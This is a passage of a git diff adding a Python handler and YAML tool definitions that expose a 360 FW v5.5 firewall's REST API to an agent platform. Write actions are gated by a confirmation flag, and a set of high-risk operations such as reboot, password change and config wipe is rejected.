+    "fw_static_route_delete": ("DELETE", "/static_route?protocol=1", lambda a: payload_or(a, build_static_route_body)),
+}
+
+
+def _add_raw_specs(actions: dict[str, tuple[str, str]]) -> None:
+    for action, (method, path) in actions.items():
+        ACTION_SPECS.setdefault(action, (method, path, lambda a: require_payload(a.get("body"))))
+
+
+_add_raw_specs(
+    {
+        "fw_addressgroup_create": ("POST", "/addressgroup"),
+        "fw_addressgroup_update": ("PUT", "/addressgroup"),
+        "fw_addressgroup_delete": ("DELETE", "/addressgroup"),
+        "fw_servicegroup_create": ("POST", "/servicegroup"),
+        "fw_servicegroup_update": ("PUT", "/servicegroup"),
+        "fw_servicegroup_delete": ("DELETE", "/servicegroup"),
+        "fw_dom_obj_create": ("POST", "/dom_obj"),
+        "fw_dom_obj_delete": ("DELETE", "/dom_obj"),
+        "fw_dns_custom_create": ("POST", "/dns_custom"),
+        "fw_dns_custom_update": ("PUT", "/dns_custom"),
+        "fw_dns_custom_delete": ("DELETE", "/dns_custom"),
+        "fw_dns_group_create": ("POST", "/dns_group"),
+        "fw_dns_group_update": ("PUT", "/dns_group"),
+        "fw_dns_group_delete": ("DELETE", "/dns_group"),
+        "fw_timeabsobj_create": ("POST", "/timeabsobj"),
+        "fw_timeabsobj_delete": ("DELETE", "/timeabsobj"),
+        "fw_timecycobj_create": ("POST", "/timecycobj"),
+        "fw_timecycobj_update": ("PUT", "/timecycobj"),
+        "fw_timecycobj_delete": ("DELETE", "/timecycobj"),
+        "fw_app_obj_create": ("POST", "/app_obj"),
+        "fw_app_obj_update": ("PUT", "/app_obj"),
+        "fw_app_obj_delete": ("DELETE", "/app_obj"),
+        "fw_app_group_create": ("POST", "/app_group"),
+        "fw_app_group_delete": ("DELETE", "/app_group"),
+        "fw_blackList_group_create": ("POST", "/blackList_group"),
+        "fw_blackList_group_delete": ("DELETE", "/blackList_group"),
+        "fw_blackListGroup_rename": ("PUT", "/blackListGroup_rename"),
+        "fw_xml_av_profile_create": ("POST", "/xml_av_profile"),
+        "fw_xml_av_profile_update": ("PUT", "/xml_av_profile"),
+        "fw_xml_av_profile_delete": ("DELETE", "/xml_av_profile"),
+        "fw_signature_set_create": ("POST", "/signature_set"),
+        "fw_signature_set_update": ("PUT", "/signature_set"),
+        "fw_signature_set_delete": ("DELETE", "/signature_set"),
+        "fw_fwpolicy_create": ("POST", "/fwpolicy"),
+        "fw_fwpolicy_update": ("PUT", "/fwpolicy"),
+        "fw_fwpolicy_delete": ("DELETE", "/fwpolicy"),
+        "fw_fwpolicy_move": ("PUT", "/fwpolicy_move"),
+        "fw_app_policy_create": ("POST", "/app_policy"),
+        "fw_app_policy_delete": ("DELETE", "/app_policy"),
+        "fw_web_policy_create": ("POST", "/web_policy"),
+        "fw_web_policy_delete": ("DELETE", "/web_policy"),
+        "fw_black_list_create": ("POST", "/black_list"),
+        "fw_black_list_delete": ("DELETE", "/black_list"),
+        "fw_white_list_create": ("POST", "/white_list"),
+        "fw_white_list_delete": ("DELETE", "/white_list"),
+        "fw_multiple_domains_create": ("POST", "/multiple_domains"),
+        "fw_multiple_domains_delete": ("DELETE", "/multiple_domains"),
+        "fw_multiple_ids_create": ("POST", "/multiple_ids"),
+        "fw_multiple_ids_delete": ("DELETE", "/multiple_ids"),
+        "fw_protect_policy_create": ("POST", "/protect_policy"),
+        "fw_protect_policy_delete": ("DELETE", "/protect_policy"),
+        "fw_protect_policy_enable_update": ("PUT", "/protect_policy_enable"),
+        "fw_vsys_create": ("POST", "/vsys"),
+        "fw_vsys_update": ("PUT", "/vsys"),
+        "fw_vsys_delete": ("DELETE", "/vsys"),
+        "fw_vlan_create": ("POST", "/vlan"),
+        "fw_vlan_update": ("PUT", "/vlan"),
+        "fw_vlan_delete": ("DELETE", "/vlan"),
+        "fw_healthcheck_create": ("POST", "/healthcheck_list"),
+        "fw_healthcheck_update": ("PUT", "/healthcheck_list"),
+        "fw_healthcheck_delete": ("DELETE", "/healthcheck_list"),
+        "fw_link_health_check_create": ("POST", "/link_health_check"),
+        "fw_link_health_check_update": ("PUT", "/link_health_check"),
+        "fw_link_health_check_delete": ("DELETE", "/link_health_check"),
+        "fw_qos_line_create": ("POST", "/qos_line"),
+        "fw_qos_line_update": ("PUT", "/qos_line"),
+        "fw_qos_line_delete": ("DELETE", "/qos_line"),
+        "fw_qos_policy_create": ("POST", "/qos_policy"),
+        "fw_qos_policy_delete": ("DELETE", "/qos_policy"),
+        "fw_nat_pool_create": ("POST", "/nat_pool"),
+        "fw_nat_pool_delete": ("DELETE", "/nat_pool"),
+        "fw_policy_route_create": ("POST", "/policy_route"),
+        "fw_policy_route_delete": ("DELETE", "/policy_route"),
+        "fw_sdwan_policy_create": ("POST", "/sdwan_policy"),
+        "fw_sdwan_policy_delete": ("DELETE", "/sdwan_policy"),
+        "fw_gre_create": ("POST", "/gre"),
+        "fw_gre_update": ("PUT", "/gre"),
+        "fw_gre_delete": ("DELETE", "/gre"),
+        "fw_tunnel_monitor_create": ("POST", "/tunnel_monitor"),
+        "fw_tunnel_monitor_delete": ("DELETE", "/tunnel_monitor"),
+        "fw_autoike_create": ("POST", "/autoike"),
+        "fw_autoike_delete": ("DELETE", "/autoike"),
+        "fw_phase2ike_create": ("POST", "/phase2ike"),
+        "fw_phase2ike_delete": ("DELETE", "/phase2ike"),
+        "fw_ipsec_policy_create": ("POST", "/ipsec_policy"),
+        "fw_ipsec_policy_delete": ("DELETE", "/ipsec_policy"),
+        "fw_bgp_info_create": ("POST", "/bgp_info"),
+        "fw_bgp_info_delete": ("DELETE", "/bgp_info"),
+        "fw_bgp_network_create": ("POST", "/bgp_network"),
+        "fw_bgp_network_delete": ("DELETE", "/bgp_network"),
+        "fw_bgp_peer_group_create": ("POST", "/bgp_peer_group"),
+        "fw_bgp_peer_group_delete": ("DELETE", "/bgp_peer_group"),
+        "fw_bgp_neighbors_create": ("POST", "/bgp_neighbors"),
+        "fw_bgp_neighbors_delete": ("DELETE", "/bgp_neighbors"),
+        "fw_bgp_access_list_create": ("POST", "/bgp_access_list"),
+        "fw_bgp_access_list_delete": ("DELETE", "/bgp_access_list"),
+        "fw_bgp_filter_list_create": ("POST", "/bgp_filter_list"),
+        "fw_bgp_filter_list_delete": ("DELETE", "/bgp_filter_list"),
+        "fw_bgp_route_map_create": ("POST", "/bgp_route_map"),
+        "fw_bgp_route_map_delete": ("DELETE", "/bgp_route_map"),
+        "fw_bgp_map_list_create": ("POST", "/bgp_map_list"),
+        "fw_bgp_map_list_delete": ("DELETE", "/bgp_map_list"),
+        "fw_bgp_prefix_list_create": ("POST", "/bgp_prefix_list"),
+        "fw_bgp_prefix_list_delete": ("DELETE", "/bgp_prefix_list"),
+        "fw_bgp_prefix_policy_create": ("POST", "/bgp_prefix_policy"),
+        "fw_bgp_prefix_policy_delete": ("DELETE", "/bgp_prefix_policy"),
+        "fw_bgp_import_check_update": ("PUT", "/bgp_import_check"),
+        "fw_bgp_reflector_switch_update": ("PUT", "/bgp_reflector_switch"),
+        "fw_bgp_timer_update": ("PUT", "/bgp_timer"),
+        "fw_bgp_route_reflector_create": ("POST", "/bgp_route_reflector"),
+        "fw_bgp_route_reflector_delete": ("DELETE", "/bgp_route_reflector"),
+        "fw_user_create": ("POST", "/user"),
+        "fw_user_delete": ("DELETE", "/user"),
+        "fw_user_group_create": ("POST", "/user_group"),
+        "fw_user_group_update": ("PUT", "/user_group"),
+        "fw_user_group_delete": ("DELETE", "/user_group"),
+        "fw_radius_create": ("POST", "/radius"),
+        "fw_radius_update": ("PUT", "/radius"),
+        "fw_radius_delete": ("DELETE", "/radius"),
+        "fw_ldap_create": ("POST", "/ldap"),
+        "fw_ldap_delete": ("DELETE", "/ldap"),
+        "fw_v0_0_1_syslog_server_create": ("POST", "/v0.0.1/syslog_server"),
+        "fw_v0_0_1_syslog_server_delete": ("DELETE", "/v0.0.1/syslog_server"),
+    }
+)
+
+GROUP_ACTIONS: dict[str, set[str]] = {
+    "system": {
+        "fw_check_login",
+        *{k for k in GET_ACTIONS if k.startswith("fw_") and any(token in k for token in ("system", "interface", "ha_", "lte_", "loopback", "ntp", "syslog", "log_filter", "policy_config", "license", "virtual_route", "diagnose"))},
+    },
+    "objects": {
+        *{k for k in GET_ACTIONS if any(token in k for token in ("address", "service", "predefined", "dom_", "dns_", "time", "app_", "get_app", "blackList", "xml", "signature"))},
+        *{k for k in ACTION_SPECS if any(token in k for token in ("address", "service", "dom_", "dns_", "time", "app_", "blackList", "xml", "signature"))},
+        "fw_object_call",
+    },
+    "policy": {
+        *{k for k in GET_ACTIONS if any(token in k for token in ("fwpolicy", "policy_group", "app_policy", "web_policy", "black_list", "white_list", "protect_policy"))},
+        *{k for k in ACTION_SPECS if any(token in k for token in ("fwpolicy", "policy_group", "app_policy", "web_policy", "black_list", "white_list", "multiple_", "protect_policy", "vsys"))},
+        "fw_policy_call",
+    },
+    "network": {
+        *{k for k in GET_ACTIONS if any(token in k for token in ("interface", "vlan", "vxlan", "static_route", "health", "qos", "nat_", "policy_route", "sdwan", "woc", "gre"))},
+        *{k for k in ACTION_SPECS if any(token in k for token in ("vlan", "static_route", "health", "qos", "nat_", "policy_route", "sdwan", "gre", "tunnel_monitor"))},
+        "fw_network_call",
+    },
+    "vpn_bgp": {
+        *{k for k in GET_ACTIONS if any(token in k for token in ("autoike", "ipsec", "ikesa", "tunnel_status", "bgp_"))},
+        *{k for k in ACTION_SPECS if any(token in k for token in ("autoike", "phase2ike", "ipsec", "bgp_"))},
+        "fw_vpn_bgp_call",
+    },
+    "auth_security": {
+        *{k for k in GET_ACTIONS if any(token in k for token in ("user", "radius", "ldap", "syslog"))},
+        *{k for k in ACTION_SPECS if any(token in k for token in ("user", "radius", "ldap", "syslog", "multiple_"))},
+        "fw_auth_security_call",
+    },
+    "observability": {
+        *{k for k in GET_ACTIONS if any(token in k for token in ("cpu", "memory", "device_", "flow", "monitor", "url_", "threaten", "tunnel_status", "vxlan"))},
+        "fw_observability_call",
+    },
+    "api_readonly": {"fw_api_catalog", "fw_call_raw_readonly"},
+    "api_mutation": {"fw_call_mutation", "fw_call_api"},
+}
+
+CONNECTIVITY_TEST_ACTIONS = {
+    "system": "fw_check_login",
+    "objects": "fw_addressobj_list",
+    "policy": "fw_fwpolicy_list",
+    "network": "fw_interface_list",
+    "vpn_bgp": "fw_autoike_list",
+    "auth_security": "fw_user_group_list",
+    "observability": "fw_cpu_state",
+    "api_readonly": "fw_api_catalog",
+}
+
+
+def fw_check_login(args: dict[str, Any]) -> ToolResult:
+    return ok(get_client().login())
+
+
+def fw_api_catalog(args: dict[str, Any]) -> ToolResult:
+    return ok(
+        {
+            "documented_rest_api_resources": DOCUMENTED_API_METHODS,
+            "blocked_high_risk_resources": BLOCKED_HIGH_RISK_MUTATIONS,
+            "known_problem_resources": KNOWN_PROBLEM_RESOURCES,
+            "covered_by": {
+                "GET": "fw_call_raw_readonly or fw_call_api",
+                "POST_PUT_DELETE": "fw_call_mutation or fw_call_api",
+                "grouped_tools": sorted(GROUP_ACTIONS),
+            },
+            "version": {
+                "product_version": PRODUCT_VERSION,
+                "fw_software_version": FW_SOFTWARE_VERSION,
+                "version_software": FW_BUILD_VERSION,
+            },
+        }
+    )
+
+
+def call_get_action(action: str, args: dict[str, Any]) -> ToolResult:
+    path = GET_ACTIONS[action]
+    if action == "fw_interface_get":
+        query = query_from_args(args, ["name"])
+    elif action.endswith("_get") or action.endswith("_list"):
+        query = query_from_args(args, ["name", "id", "custom_name", "app_id", "ip_vrf_name"])
+    else:
+        query = query_from_args(args, ["type", "period", "flow", "inf_type", "stat_type", "status_type", "page", "length", "user_type"])
+    return api_result(get_client().get(path, query=query))
+
+
+def call_action_spec(action: str, args: dict[str, Any]) -> ToolResult:
+    method, path, builder = ACTION_SPECS[action]
+    reject_high_risk_mutation(method, path)
+    validate_documented_api(method, path)
+    body = builder(args) if builder is not None else optional_payload(args.get("body"))
+    return api_result(get_client().request(method, path, query=query_from_args(args, []), body=body))
+
+
+def fw_call_raw_readonly(args: dict[str, Any]) -> ToolResult:
+    path = normalize_api_path(require_text(args.get("path"), "path"))
+    validate_documented_api("GET", path)
+    query = args.get("query")
+    if query is not None and not isinstance(query, dict):
+        raise FwApiError("query must be an object")
+    return api_result(get_client().get(path, query=query))
+
+
+def fw_call_mutation(args: dict[str, Any]) -> ToolResult:
+    method = str(args.get("method", "")).upper()
+    path = normalize_api_path(require_text(args.get("path"), "path"))
+    if method not in {"POST", "PUT", "DELETE"}:
+        raise FwApiError("method must be POST, PUT, or DELETE")
+    reject_high_risk_mutation(method, path)
+    validate_documented_api(method, path)
+    query = args.get("query")
+    if query is not None and not isinstance(query, dict):
+        raise FwApiError("query must be an object")
+    return api_result(get_client().request(method, path, query=query, body=optional_payload(args.get("body"))))
+
+
+def fw_call_api(args: dict[str, Any]) -> ToolResult:
+    method = str(args.get("method", "GET")).upper()
+    path = normalize_api_path(require_text(args.get("path"), "path"))
+    if method not in {"GET", "POST", "PUT", "DELETE"}:
+        raise FwApiError("method must be GET, POST, PUT, or DELETE")
+    if method == "GET":
+        return fw_call_raw_readonly({**args, "path": path})
+    return fw_call_mutation({**args, "method": method, "path": path})
+
+
+def grouped_raw_call(args: dict[str, Any]) -> ToolResult:
+    method = str(args.get("method", "GET")).upper()
+    if method == "GET":
+        return fw_call_raw_readonly(args)
+    return fw_call_mutation(args)
+
+
+_ACTION_MAP: dict[str, Callable[[dict[str, Any]], ToolResult]] = {
+    "fw_check_login": fw_check_login,
+    "fw_api_catalog": fw_api_catalog,
+    "fw_call_raw_readonly": fw_call_raw_readonly,
+    "fw_call_mutation": fw_call_mutation,
+    "fw_call_api": fw_call_api,
+    "fw_object_call": grouped_raw_call,
+    "fw_policy_call": grouped_raw_call,
+    "fw_network_call": grouped_raw_call,
+    "fw_vpn_bgp_call": grouped_raw_call,
+    "fw_auth_security_call": grouped_raw_call,
+    "fw_observability_call": grouped_raw_call,
+}
+
+for _action_name in GET_ACTIONS:
+    _ACTION_MAP.setdefault(_action_name, lambda args, action=_action_name: call_get_action(action, args))
+for _action_name in ACTION_SPECS:
+    _ACTION_MAP.setdefault(_action_name, lambda args, action=_action_name: call_action_spec(action, args))
+
+
+async def unified_ops(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    del ctx
+    handler = _ACTION_MAP.get(action)
+    if handler is None:
+        available = ", ".join(sorted(_ACTION_MAP))
+        return ToolResult(success=False, error=f"Unknown action: {action}. Available: {available}")
+    try:
+        return await asyncio.to_thread(handler, params)
+    except FwApiError as exc:
+        return ToolResult(
+            success=False,
+            error=str(exc),
+            metadata={"source": "360 FW", "version": PRODUCT_VERSION, "action": action},
+        )
+    except Exception as exc:
+        return ToolResult(
+            success=False,
+            error=f"Unexpected 360 FW error: {exc}",
+            metadata={"source": "360 FW", "version": PRODUCT_VERSION, "action": action},
+        )
+
+
+async def _dispatch_group(ctx: ToolContext, group: str, action: str, **params: Any) -> ToolResult:
+    if action == "test":
+        test_action = CONNECTIVITY_TEST_ACTIONS.get(group)
+        if test_action:
+            return await unified_ops(ctx, action=test_action, **params)
+        return ToolResult(success=False, error=f"360 FW group {group} does not define a test probe")
+    if action not in GROUP_ACTIONS[group]:
+        available = ", ".join(sorted(GROUP_ACTIONS[group]))
+        return ToolResult(success=False, error=f"Unsupported {group} action: {action}. Available: {available}")
+    return await unified_ops(ctx, action=action, **params)
+
+
+async def system(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    return await _dispatch_group(ctx, "system", action, **params)
+
+
+async def objects(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    return await _dispatch_group(ctx, "objects", action, **params)
+
+
+async def policy(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    return await _dispatch_group(ctx, "policy", action, **params)
+
+
+async def network(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    return await _dispatch_group(ctx, "network", action, **params)
+
+
+async def vpn_bgp(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    return await _dispatch_group(ctx, "vpn_bgp", action, **params)
+
+
+async def auth_security(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    return await _dispatch_group(ctx, "auth_security", action, **params)
+
+
+async def observability(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    return await _dispatch_group(ctx, "observability", action, **params)
+
+
+async def api_readonly(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    return await _dispatch_group(ctx, "api_readonly", action, **params)
+
+
+async def api_mutation(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    return await _dispatch_group(ctx, "api_mutation", action, **params)
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_api_mutation.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_api_mutation.yaml
new file mode 100644
index 000000000..dbcda386f
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_api_mutation.yaml
@@ -0,0 +1,38 @@
+name: 360_fw_api_mutation
+description: >
+  360 FW v5.5 官方 REST 变更调用工具。该工具通过 Flocks requires_confirmation
+  触发确认；保存配置、改密码、清配置、重启、恢复、升级、许可写入、HA 写入、
+  全局开关写入、清会话/命中、ISP 修改、生产顺序移动、BGP 清路由等高风险接口会直接拒绝。
+category: custom
+enabled: true
+requires_confirmation: true
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: REST 变更操作名称。
+      enum:
+        - fw_call_mutation
+        - fw_call_api
+        - test
+    method:
+      type: string
+      enum: [GET, POST, PUT, DELETE]
+      description: HTTP 方法。
+    path:
+      type: string
+      description: 已收录的 /API 相对路径，例如 /addressobj。
+    query:
+      type: object
+      description: 可选查询参数，会编码为普通 URL query string。
+    body:
+      type: string
+      description: POST、PUT 或 DELETE 调用使用的 JSON 请求体，传入对象或数组的 JSON 字符串。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: api_mutation
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_api_readonly.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_api_readonly.yaml
new file mode 100644
index 000000000..a6e7fe846
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_api_readonly.yaml
@@ -0,0 +1,30 @@
+name: 360_fw_api_readonly
+description: >
+  360 FW v5.5 官方 REST 只读调用工具。可用 fw_api_catalog 查看已收录接口，
+  或用 fw_call_raw_readonly 调用已收录 GET 接口。
+category: custom
+enabled: true
+requires_confirmation: false
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: REST 只读操作名称。
+      enum:
+        - fw_api_catalog
+        - fw_call_raw_readonly
+        - test
+    path:
+      type: string
+      description: 已收录的 /API 相对路径，例如 /sys_info。
+    query:
+      type: object
+      description: 可选查询参数，会编码为普通 URL query string。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: api_readonly
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_auth_security.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_auth_security.yaml
new file mode 100644
index 000000000..01496cb1a
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_auth_security.yaml
@@ -0,0 +1,58 @@
+name: 360_fw_auth_security
+description: >
+  360 FW v5.5 认证源、管理员、用户组、syslog、联动和安全扩展对象工具。
+  写操作需要确认。
+category: custom
+enabled: true
+requires_confirmation: true
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: 认证和安全对象操作名称。
+      enum:
+        - fw_user_list
+        - fw_user_create
+        - fw_user_delete
+        - fw_user_group_list
+        - fw_user_group_create
+        - fw_user_group_update
+        - fw_user_group_delete
+        - fw_user_obj_list
+        - fw_radius_list
+        - fw_radius_create
+        - fw_radius_update
+        - fw_radius_delete
+        - fw_ldap_list
+        - fw_ldap_create
+        - fw_ldap_delete
+        - fw_syslog_server_get
+        - fw_v0_0_1_syslog_server_get
+        - fw_v0_0_1_syslog_server_create
+        - fw_v0_0_1_syslog_server_delete
+        - fw_multiple_ids_create
+        - fw_multiple_ids_delete
+        - fw_multiple_domains_create
+        - fw_multiple_domains_delete
+        - fw_auth_security_call
+        - test
+    name:
+      type: string
+    method:
+      type: string
+      enum: [GET, POST, PUT, DELETE]
+    path:
+      type: string
+    query:
+      type: object
+    body:
+      type: string
+      description: 完整 JSON payload 字符串。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: auth_security
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_network.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_network.yaml
new file mode 100644
index 000000000..604117df6
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_network.yaml
@@ -0,0 +1,90 @@
+name: 360_fw_network
+description: >
+  360 FW v5.5 网络、路由、NAT、QoS、健康检查、策略路由、SD-WAN 和 GRE 工具。
+  写操作需要确认，生产顺序移动和高风险运行态动作由 handler 拦截。
+category: custom
+enabled: true
+requires_confirmation: true
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: 网络操作名称。
+      enum:
+        - fw_interface_list
+        - fw_interface_get
+        - fw_vlan_list
+        - fw_vlan_create
+        - fw_vlan_update
+        - fw_vlan_delete
+        - fw_vxlan_list
+        - fw_static_route_list
+        - fw_static_route_create
+        - fw_static_route_delete
+        - fw_healthcheck_list
+        - fw_healthcheck_create
+        - fw_healthcheck_update
+        - fw_healthcheck_delete
+        - fw_link_health_check_list
+        - fw_link_health_check_create
+        - fw_link_health_check_update
+        - fw_link_health_check_delete
+        - fw_qos_line_list
+        - fw_qos_line_create
+        - fw_qos_line_update
+        - fw_qos_line_delete
+        - fw_qos_policy_list
+        - fw_qos_policy_create
+        - fw_qos_policy_delete
+        - fw_nat_pool_list
+        - fw_nat_pool_create
+        - fw_nat_pool_delete
+        - fw_nat_rule_src_list
+        - fw_nat_rule_dst_list
+        - fw_nat_rule_static_list
+        - fw_policy_route_list
+        - fw_policy_route_create
+        - fw_policy_route_delete
+        - fw_sdwan_policy_list
+        - fw_sdwan_policy_create
+        - fw_sdwan_policy_delete
+        - fw_sdwan_status_get
+        - fw_woc_policy_state_get
+        - fw_gre_list
+        - fw_gre_create
+        - fw_gre_update
+        - fw_gre_delete
+        - fw_tunnel_monitor_create
+        - fw_tunnel_monitor_delete
+        - fw_network_call
+        - test
+    name:
+      type: string
+      description: 对象名称。
+    dst_ip:
+      type: string
+      description: 静态路由目的地址。
+    nh_ip:
+      type: string
+      description: 下一跳地址。
+    ip_vrf_name:
+      type: string
+      description: 虚拟路由器名称，默认 default。
+    method:
+      type: string
+      enum: [GET, POST, PUT, DELETE]
+    path:
+      type: string
+    query:
+      type: object
+    body:
+      type: string
+      description: 完整 JSON payload 字符串。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: network
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_objects.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_objects.yaml
new file mode 100644
index 000000000..865e0da36
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_objects.yaml
@@ -0,0 +1,120 @@
+name: 360_fw_objects
+description: >
+  360 FW v5.5 对象工具。覆盖地址、服务、域名、DNS、时间、应用和安全对象等
+  文档中非跳过对象接口。写操作需要确认。
+category: custom
+enabled: true
+requires_confirmation: true
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: 对象操作名称。
+      enum:
+        - fw_addressobj_list
+        - fw_addressobj_get
+        - fw_addressobj_create
+        - fw_addressobj_update
+        - fw_addressobj_delete
+        - fw_addressgroup_list
+        - fw_addressgroup_get
+        - fw_addressgroup_create
+        - fw_addressgroup_update
+        - fw_addressgroup_delete
+        - fw_serviceobj_list
+        - fw_serviceobj_get
+        - fw_serviceobj_create
+        - fw_serviceobj_update
+        - fw_serviceobj_delete
+        - fw_servicegroup_list
+        - fw_servicegroup_get
+        - fw_servicegroup_create
+        - fw_servicegroup_update
+        - fw_servicegroup_delete
+        - fw_predefined_service_list
+        - fw_dom_obj_list
+        - fw_dom_obj_create
+        - fw_dom_obj_delete
+        - fw_dns_custom_list
+        - fw_dns_custom_get
+        - fw_dns_custom_create
+        - fw_dns_custom_update
+        - fw_dns_custom_delete
+        - fw_dns_group_list
+        - fw_dns_group_get
+        - fw_dns_group_create
+        - fw_dns_group_update
+        - fw_dns_group_delete
+        - fw_timeabsobj_list
+        - fw_timeabsobj_get
+        - fw_timeabsobj_create
+        - fw_timeabsobj_delete
+        - fw_timecycobj_list
+        - fw_timecycobj_get
+        - fw_timecycobj_create
+        - fw_timecycobj_update
+        - fw_timecycobj_delete
+        - fw_app_obj_list
+        - fw_app_obj_get
+        - fw_app_obj_create
+        - fw_app_obj_update
+        - fw_app_obj_delete
+        - fw_app_group_list
+        - fw_app_group_get
+        - fw_app_group_create
+        - fw_app_group_delete
+        - fw_get_app_list
+        - fw_get_app_detail
+        - fw_blackList_group_list
+        - fw_blackList_group_create
+        - fw_blackList_group_delete
+        - fw_blackListGroup_rename
+        - fw_xml_av_profile_list
+        - fw_xml_av_profile_create
+        - fw_xml_av_profile_update
+        - fw_xml_av_profile_delete
+        - fw_signature_set_list
+        - fw_signature_set_create
+        - fw_signature_set_update
+        - fw_signature_set_delete
+        - fw_object_call
+        - test
+    name:
+      type: string
+      description: 对象名称。
+    new_name:
+      type: string
+      description: 重命名后的对象名称。
+    type:
+      type: integer
+      description: 地址对象、名单或时间对象类型。
+    addr:
+      type: string
+      description: 地址对象 IP、网段或域名。
+    desc:
+      type: string
+      description: 描述。
+    sev_str:
+      type: string
+      description: 服务对象字符串，例如 TCP/1-65535:80。
+    path:
+      type: string
+      description: fw_object_call 使用的 /API 相对路径。
+    method:
+      type: string
+      enum: [GET, POST, PUT, DELETE]
+      description: fw_object_call 使用的 HTTP 方法。
+    query:
+      type: object
+      description: 查询参数对象。
+    body:
+      type: string
+      description: 写操作完整 JSON payload 字符串；不传时部分动作会按参数生成常用 payload。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: objects
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_observability.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_observability.yaml
new file mode 100644
index 000000000..83bfeb031
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_observability.yaml
@@ -0,0 +1,68 @@
+name: 360_fw_observability
+description: >
+  360 FW v5.5 监控观测工具。用于 CPU、内存、流量、连接、应用、URL、威胁、
+  用户、接口、QoS、隧道和 VXLAN 监控查询。
+category: custom
+enabled: true
+requires_confirmation: false
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: 监控观测操作名称。
+      enum:
+        - fw_cpu_state
+        - fw_memory_state
+        - fw_device_state
+        - fw_device_link_state
+        - fw_interface_flow_state
+        - fw_interface_flow_bar_state
+        - fw_user_flow_state
+        - fw_user_flow_bar_state
+        - fw_monitor_user
+        - fw_app_flow_state
+        - fw_app_flow_bar_state
+        - fw_url_state
+        - fw_url_bar_state
+        - fw_threaten_state
+        - fw_threaten_bar_state
+        - fw_get_app_detail_monitor
+        - fw_interface_monitor
+        - fw_interface_monitor_vlan
+        - fw_qos_monitor
+        - fw_tunnel_status_table
+        - fw_tunnel_status_line
+        - fw_vxlan_monitor
+        - fw_observability_call
+        - test
+    type:
+      type: integer
+    period:
+      type: integer
+    flow:
+      type: integer
+    inf_type:
+      type: integer
+    stat_type:
+      type: integer
+    status_type:
+      type: integer
+    page:
+      type: integer
+    length:
+      type: integer
+    method:
+      type: string
+      enum: [GET]
+    path:
+      type: string
+    query:
+      type: object
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: observability
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_policy.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_policy.yaml
new file mode 100644
index 000000000..15581792c
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_policy.yaml
@@ -0,0 +1,79 @@
+name: 360_fw_policy
+description: >
+  360 FW v5.5 策略工具。覆盖防火墙策略、策略组、应用/WEB/防护策略、
+  黑白名单、多域名和 VSYS 等文档中非跳过接口。写操作需要确认。
+category: custom
+enabled: true
+requires_confirmation: true
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: 策略操作名称。
+      enum:
+        - fw_fwpolicy_list
+        - fw_fwpolicy_get
+        - fw_fwpolicy_create
+        - fw_fwpolicy_update
+        - fw_fwpolicy_delete
+        - fw_fwpolicy_state_update
+        - fw_fwpolicy_move
+        - fw_policy_group_list
+        - fw_policy_group_create
+        - fw_policy_group_delete
+        - fw_app_policy_list
+        - fw_app_policy_create
+        - fw_app_policy_delete
+        - fw_web_policy_list
+        - fw_web_policy_create
+        - fw_web_policy_delete
+        - fw_black_list_list
+        - fw_black_list_create
+        - fw_black_list_delete
+        - fw_white_list_list
+        - fw_white_list_create
+        - fw_white_list_delete
+        - fw_multiple_domains_create
+        - fw_multiple_domains_delete
+        - fw_multiple_ids_create
+        - fw_multiple_ids_delete
+        - fw_protect_policy_list
+        - fw_protect_policy_create
+        - fw_protect_policy_delete
